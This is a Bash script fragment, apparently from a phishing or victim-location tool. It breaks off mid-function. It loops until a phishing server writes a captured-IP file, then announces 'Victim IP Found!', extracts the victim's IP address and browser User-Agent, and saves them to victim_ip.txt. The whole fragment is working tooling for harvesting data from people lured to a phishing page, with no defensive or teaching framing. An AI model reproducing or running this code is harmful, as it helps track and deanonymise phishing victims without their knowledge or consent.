glocfound() {

printf "\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;93m Waiting for Victim ,\e[0m\e[1;96m Ctrl + C to exit.\e[0m\n"
while [ true ]; do


if [[ -e ".server/location/ip.txt" ]]; then
printf "\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m*\e[0m\e[1;31m]\e[0m\e[1;92m Victim IP Found!\n"
printf "\e[0m\n"
gloc_catch_ip

fi
sleep 1
done 

}
gloc_catch_ip() {

touch location.txt
glocip=$(grep -a 'IP:' .server/location/ip.txt | cut -d " " -f2 | tr -d '\r')
IFS=$'\n'
glocua=$(grep 'User-Agent:' .server/location/ip.txt | cut -d '"' -f2)
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;92m Victim IP :\e[0m\e[1;96m %s\e[0m\n" $glocip
printf "\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;92m User-Agent :\e[0m\e[1;96m %s\e[0m\n" $glocua
printf "\e[0m\n"
printf " \e[1;31m[\e[0m\e[1;77m~\e[0m\e[1;31m]\e[0m\e[1;96m Saved:\e[0m\e[1;93m victim_ip.txt\e[0m\n"
cat .server/location/ip.txt >> victim_ip.txt

